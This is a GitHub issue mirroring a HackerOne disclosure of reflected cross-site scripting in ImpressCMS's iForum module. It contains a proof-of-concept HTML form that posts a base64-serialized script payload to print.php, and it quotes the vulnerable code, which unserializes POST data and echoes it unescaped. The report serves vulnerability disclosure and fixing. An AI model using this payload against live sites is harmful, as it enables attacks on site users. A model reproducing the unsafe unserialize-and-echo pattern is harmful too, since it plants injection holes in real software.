Skip to content

Reflected XSS #12

New issue
New issue
Open
Open
Reflected XSS#12
Labels
security
Milestone
2.3.0
@fiammybe

Description

@fiammybe
fiammybe
opened on Jun 21, 2021

Link: https://hackerone.com/reports/1050605
Date: 2020-12-04 14:13:51 UTC
By: hackerone_success
Weakness: Cross-site Scripting (XSS) - Reflected

Details:
Hi! In module iforum XSS.

Any can download this module from
https://sourceforge.net/projects/impresscms/files/ImpressCMS%20Modules/iForum/

You need login in tested account on CMS (any). Run and click submit.

<html>
    <form name=poc_xss_iforum action='https://www.impresscms.org/modules/iforum/print.php' method=post>
        <input type=hidden name=action value=upgrade>
        <input type=hidden name="post_data" value='YTo0OntzOjM6InVybCI7czoyNToiPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PiI7aTowO3M6NDoidGV4dCI7aToxO3M6NjoiYXV0aG9yIjtpOjI7czo0OiJkYXRlIjt9123'>
		<!-- echo base64_encode(serialize(['url' => '<script>alert(1)</script>','text','author', 'date'])); -->
		<input type=submit>
    </form>
</html>

Vulnerable code

$post_data = unserialize(base64_decode($_POST["post_data"]));

below

<p>"._MD_COMEFROM . "&nbsp;".$post_data["url"]."</p>

PoC on site https://www.impresscms.org demonstrated
{F1104005}

Impact

XSS

Metadata

Metadata

Assignees

No one assigned

    Labels

    security

    Type

    No type

    Projects

    No projects

    Milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions